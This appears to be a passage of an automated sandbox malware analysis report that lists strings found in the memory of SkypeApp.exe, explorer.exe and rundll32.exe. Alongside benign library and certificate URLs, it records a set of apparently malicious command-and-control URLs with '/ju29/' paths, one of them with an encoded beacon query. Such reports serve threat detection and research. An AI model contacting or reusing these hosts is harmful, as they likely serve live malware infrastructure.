          Source: SkypeApp.exe, 0000001C.00000003.3206225605.00000175FEC00000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3458082522.0000016D828EA000.00000004.00000800.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3252862995.0000016D80008000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: __d(function(e,n,t,r){"use strict";var a;Object.defineProperty(r,"__esModule",{value:!0}),function(e){e[e.VideoError=0]="VideoError",e[e.PlayerStateChanged=1]="PlayerStateChanged",e[e.Play=2]="Play",e[e.Pause=3]="Pause",e[e.GetCurrentTime=4]="GetCurrentTime",e[e.CurrentTime=5]="CurrentTime",e[e.SeekTo=6]="SeekTo"}(a=r.MessageType||(r.MessageType={})),r.default=function(e){return{html:"\n<html>\n<head>\n<style>\n iframe, html, body {\n margin: 0;\n padding: 0;\n background-color: black;\n width: "+e.width+"px;\n height: "+e.height+"px;\n }\n\n .fillAbsolute {\n position: absolute;\n left: 0;\n top: 0;\n width: "+e.width+"px;\n height: "+e.height+'px;\n }\n</style>\n</head>\n<body>\n <div id="player"></div>\n '+(e.videoPreviewUrl?'<img id="cover" class="fillAbsolute" src="'+e.videoPreviewUrl+'"/>':"")+"\n\n <script>\n var tag = document.createElement('script');\n tag.src = \"https://www.youtube.com/iframe_api\";\n var firstScriptTag = document.getElementsByTagName('script')[0];\n firstScriptTag.parentNode.insertBefore(tag, firstScriptTag);\n\n var player;\n var coverRemoved = "+!e.videoPreviewUrl+";\n function onYouTubeIframeAPIReady() {\n player = new YT.Player('player', {\n height: '"+e.height+"',\n width: '"+e.width+"',\n videoId: '"+e.videoId+"',\n playerVars: {\n 'playsinline': 1,\n 'enablejsapi': 1,\n 'fs': 0,\n 'hl': '"+e.locale+"',\n 'iv_load_policy': 3,\n 'modestbranding': 1,\n 'controls': 0,\n 'rel': 0,\n },\n events: {\n 'onReady': onPlayerReady,\n 'onStateChange': onPlayerStateChange,\n 'onError': onError,\n }\n });\n }\n\n function onPlayerReady(event) {\n event.target.playVideo();\n\n document.addEventListener('message', function (event) {\n var data = JSON.parse(event.data);\n\n switch (data.type) {\n case "+a.Play+":\n player.playVideo();\n break;\n case "+a.Pause+":\n player.pauseVideo();\n break;\n case "+a.GetCurrentTime+":\n window.postMessage(JSON.stringify({\n type: "+a.CurrentTime+",\n currentTime: player.getCurrentTime(),\n }));\n break;\n case "+a.SeekTo+":\n player.seekTo(data.seekTo, !data.isDragging);\n break;\n }\n });\n }\n\n function onError() {\n window.postMessage(JSON.stringify({type: "+a.VideoError+"}));\n }\n\n function onPlayerStateChange(event) {\n if (event.data === 1 && !coverRemoved) {\n var cover = document.getElementById('cover');\n\n if
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3460154101.0000016D90D23000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3459867236.0000016D90D12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://aefxx.com/
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://aka.ms/fabric-assets-license
          Source: explorer.exe, 00000005.00000003.2274086803.000000000730A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3204464186.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1234977867.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2274294266.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3725032984.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1237220182.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3077516226.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3196363751.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3719528098.000000000730B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://calyptus.eu/
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://code.google.com/p/android-remote-stacktrace/
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3460154101.0000016D90D23000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3459867236.0000016D90D12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://creativecommons.org/publicdomain/zero/1.0/
          Source: explorer.exe, 00000005.00000003.2274086803.000000000730A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3204464186.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1234977867.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2274294266.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3725032984.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1237220182.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3077516226.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3196363751.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3719528098.000000000730B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
          Source: explorer.exe, 00000005.00000003.2274086803.000000000730A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3204464186.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1234977867.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2274294266.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3725032984.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1237220182.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3077516226.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3196363751.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3719528098.000000000730B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
          Source: SkypeApp.exe, 0000001C.00000003.3206225605.00000175FEC00000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3458082522.0000016D828EA000.00000004.00000800.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3252862995.0000016D80008000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facebook.github.io/react-native/docs/navigation.html
          Source: SkypeApp.exe, 0000001C.00000003.3632977195.0000016DDDBDB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facebook.github.io/react/docs/error-decoder.html?invariant=
          Source: SkypeApp.exe, 0000001C.00000003.3252862995.0000016D80008000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fb.me/use-check-prop-types
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://github.com/jordanbyron/)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://jryans.mit-license.org/)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mad4milk.net/
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://microsoft.github.io/Win2D/html/Introduction.htm)
          Source: SecuriteInfo.com.FileRepMalware.16340.31219.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: SecuriteInfo.com.FileRepMalware.16340.31219.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: explorer.exe, 00000005.00000003.2274086803.000000000730A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3204464186.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1234977867.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2274294266.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3725032984.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1237220182.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3077516226.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3196363751.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3719528098.000000000730B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
          Source: explorer.exe, 00000005.00000000.1234977867.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3717351568.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
          Source: explorer.exe, 00000005.00000002.3748918987.000000001197F000.00000004.80000000.00040000.00000000.sdmp, rundll32.exe, 00000006.00000002.3713430429.0000000004DFF000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://push.zhanzhang.baidu.com/push.js
          Source: explorer.exe, 00000005.00000000.1236699757.0000000008810000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000002.3723499643.0000000008820000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.1235635823.0000000007C70000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://typescriptlang.org
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3460154101.0000016D90D23000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3459867236.0000016D90D12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://underscorejs.org/
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.adjust.com
          Source: SkypeApp.exe, 0000001C.00000003.3459867236.0000016D90D12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000005.00000003.3074623162.000000000C420000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273873854.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2272431891.000000000C3F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3744922659.000000000C42F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1240160729.000000000C3F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074724370.000000000C42C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bodacristianyjuani.com
          Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bodacristianyjuani.com/ju29/
          Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bodacristianyjuani.com/ju29/www.dwijtechnology.com
          Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bodacristianyjuani.comReferer:
          Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.durufilmyapim.com
          Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.durufilmyapim.com/ju29/
          Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.durufilmyapim.com/ju29/www.mnchentampere.com
          Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.durufilmyapim.comReferer:
          Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.dwijtechnology.com
          Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.dwijtechnology.com/ju29/
          Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.dwijtechnology.com/ju29/www.klxcv.xyz
          Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.dwijtechnology.comReferer:
          Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.e9pf4s.top
          Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.e9pf4s.top/ju29/
          Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.e9pf4s.top/ju29/www.townstart.shop
          Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.e9pf4s.topReferer:
          Source: explorer.exe, 00000005.00000000.1234977867.00000000071B2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.foreca.com
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fsf.org/copyleft/gpl.html
          Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gaming-chairs-vn-vi-2885437.fyi
          Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gaming-chairs-vn-vi-2885437.fyi/ju29/
          Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gaming-chairs-vn-vi-2885437.fyi/ju29/www.sklm888.com
          Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gaming-chairs-vn-vi-2885437.fyiReferer:
          Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.glocraze.com
          Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.glocraze.com/ju29/
          Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.glocraze.com/ju29/www.durufilmyapim.com
          Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.glocraze.comReferer:
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3460154101.0000016D90D23000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3459867236.0000016D90D12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/codesearch/p?hl=en#dR3YEbitojA/COPYING&q=GetSystemTimeAsFileTime%20license:bsd
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3460154101.0000016D90D23000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3459867236.0000016D90D12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jetbrains.com
          Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.klxcv.xyz
          Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.klxcv.xyz/ju29/
          Source: rundll32.exe, 00000006.00000002.3699669578.00000000004B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3699669578.00000000004C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.klxcv.xyz/ju29/?M2Mp=6lX0R0Q&Bb_=4JvfAS0i2MdEJxbw4NDSiCnJ91CcqWw5bFms
          Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.klxcv.xyz/ju29/www.merchascarpamici.com
          Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.klxcv.xyz/ju29/www.xuangesmd.com
          Source: explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.klxcv.xyzReferer:
